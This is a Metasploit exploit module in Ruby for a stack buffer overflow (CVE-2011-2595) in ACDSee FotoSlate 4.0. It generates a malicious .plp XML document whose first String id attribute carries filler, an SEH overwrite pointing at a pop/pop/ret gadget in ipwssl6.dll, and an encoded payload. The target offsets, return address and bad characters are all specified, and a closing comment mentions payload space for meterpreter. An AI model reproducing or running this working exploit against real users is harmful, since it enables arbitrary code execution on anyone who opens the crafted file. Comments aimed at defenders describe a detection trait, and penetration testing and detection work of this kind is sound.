##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # ACDSee FotoSlate 4.0 Build 146 (CVE-2011-2595): an oversized id attribute
  # on a <String> element in a .plp (XML) document overflows a buffer; the
  # target table places the SEH record 1812 bytes ('Offset') into that string
  # and points it at a pop/pop/ret in ipwssl6.dll ('Ret').
  #
  # This is a FILEFORMAT module: it only writes the crafted document to disk
  # and, by default, starts no payload handler (DisablePayloadHandler => true).
  #
  # For defenders: the output is plain XML with an <ACDFotoSlateDocument15>
  # root whose first <String id="..."> attribute is 'TotalLength' (5000) bytes
  # long -- a distinctive trait for content inspection of .plp files.
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  # Declares module metadata and the single FILENAME option.
  #
  # The target hash carries the three values exploit() reads: 'Ret' (address
  # written into the SEH record), 'Offset' (bytes of filler before the SEH
  # record) and 'TotalLength' (final size of the id string).
  #
  # @param info [Hash] metadata merged in via update_info by the framework
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ACDSee FotoSlate PLP File id Parameter Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via
          a specially crafted id parameter in a String element. When viewing a malicious
          PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a
          buffer and execute arbitrary code. This exploit has been tested on systems such as
          Windows XP SP3, Windows Vista, and Windows 7.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Parvez Anwar', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2011-2595' ],
          [ 'OSVDB', '75425' ],
          [ 'BID', '49558' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
          # The module only produces a file, so no listener is started unless
          # the operator re-enables it.
          'DisablePayloadHandler' => true
        },
        'Payload' => {
          # 'Space' => 4000,
          # NUL and 0x22 ('"') are excluded because the overflow is emitted
          # inside a double-quoted XML attribute (see the <String id=...> line
          # in exploit); a quote there would end the attribute early.
          'BadChars' => "\x00\x22"
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'ACDSee FotoSlate 4.0 Build 146',
            {
              'Ret' => 0x263a5b57, # pop, pop, ret from ipwssl6.dll
              'Offset' => 1812,      # bytes of filler before the SEH record
              'TotalLength' => 5000  # total size of the id attribute value
            }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2011-09-12',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        # Name of the generated document; written via file_create in exploit.
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.plp']),
      ]
    )
  end

  # Builds the malformed PLP document and writes it to FILENAME.
  #
  # The id string is laid out as: 'Offset' bytes of random filler, the SEH
  # record built from target.ret, the encoded payload, then alphabetic padding
  # so the whole string is exactly 'TotalLength' bytes. It becomes the id
  # attribute of the first <String> element under <Properties>; the rest of
  # the template is fixed document content.
  def exploit
    overflow = rand_text(target["Offset"])          # filler up to the SEH record
    overflow << generate_seh_record(target.ret)     # SEH record -> target 'Ret'
    overflow << payload.encoded
    overflow << rand_text_alpha(target["TotalLength"] - overflow.length) # pad to TotalLength

    # Squiggly heredoc: the uniform indentation below is stripped, so the
    # emitted XML starts at column 0.
    plp = <<~TEMPLATE
      <?xml version="1.0" encoding="ISO-8859-1"?>
      <ACDFotoSlateDocument15>
      <PageDefinition>
      <Template>
      <Version>3.0</Version>
      <Page>
      <Name>Letter</Name>
      <Properties>
      <String id="#{overflow}"></String>
      <String id="Width">8.500000IN</String>
      <String id="Height">11.000000IN</String>
      <String id="Orientation">Portrait</String>
      <Bool id="AutoRotate">FALSE</Bool>
      <Bool id="AutoFill">FALSE</Bool>
      </Properties>
      <Content>
      <Bool id="UseBGColor">FALSE</Bool>
      <Int id="BGImageType">0</Int>
      <String id="BGImageFile"></String>
      <Int id="BGColor">16777215</Int>
      </Content>
      </Page>
      <ToolList>
      <Group>
      <Tool>
      <Name>Image</Name>
      <Properties>
      <String id="XPos">0.500000IN</String>
      <String id="YPos">0.500000IN</String>
      <String id="Width">7.500000IN</String>
      <String id="Height">10.000000IN</String>
      <Float id="Tilt">0.000000</Float>
      </Properties>
      <Content>
      <Int id="ShapeType">0</Int>
      <Float id="RoundRectX">0.000000</Float>
      <Float id="RoundRectY">0.000000</Float>
      <Bool id="ShrinkToFit">FALSE</Bool>
      <Bool id="AutoRotate">FALSE</Bool>
      <Float id="BorderWidth">0.000000</Float>
      <Bool id="UseBGColor">FALSE</Bool>
      <Int id="BGColor">8454143</Int>
      <Bool id="DropShadow">FALSE</Bool>
      <Int id="DSColor">0</Int>
      <Bool id="BevelEdge">FALSE</Bool>
      <Bool id="Border">FALSE</Bool>
      <Int id="BorderColor">16711680</Int>
      <Bool id="IsLocked">FALSE</Bool>
      </Content>
      </Tool>
      </Group>
      </ToolList>
      </Template>
      <PageContent>
      <Version>3.0</Version>
      <Page>
      <Name>Letter</Name>
      <Content>
      <Bool id="UseBGColor">FALSE</Bool>
      <Int id="BGImageType">0</Int>
      <String id="BGImageFile"></String>
      <Int id="BGColor">16777215</Int>
      </Content>
      </Page>
      <ToolList>
      <Group>
      <Tool>
      <Name>Image</Name>
      <Content>
      <Int id="ShapeType">0</Int>
      <Float id="RoundRectX">0.000000</Float>
      <Float id="RoundRectY">0.000000</Float>
      <Bool id="ShrinkToFit">FALSE</Bool>
      <Bool id="AutoRotate">FALSE</Bool>
      <Float id="BorderWidth">0.000000</Float>
      <Bool id="UseBGColor">FALSE</Bool>
      <Int id="BGColor">8454143</Int>
      <Bool id="DropShadow">FALSE</Bool>
      <Int id="DSColor">0</Int>
      <Bool id="BevelEdge">FALSE</Bool>
      <Bool id="Border">FALSE</Bool>
      <Int id="BorderColor">16711680</Int>
      <Bool id="IsLocked">FALSE</Bool>
      </Content>
      </Tool>
      </Group>
      </ToolList>
      </PageContent>
      </PageDefinition>
      </ACDFotoSlateDocument15>
    TEMPLATE

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(plp)
  end
end
=begin
After SEH, we have ~0x23C3 bytes (9155 in decimal) of space for payload. However, we keep the
buffer shorter than that, because a very long buffer risks breaking the meterpreter payload.
=end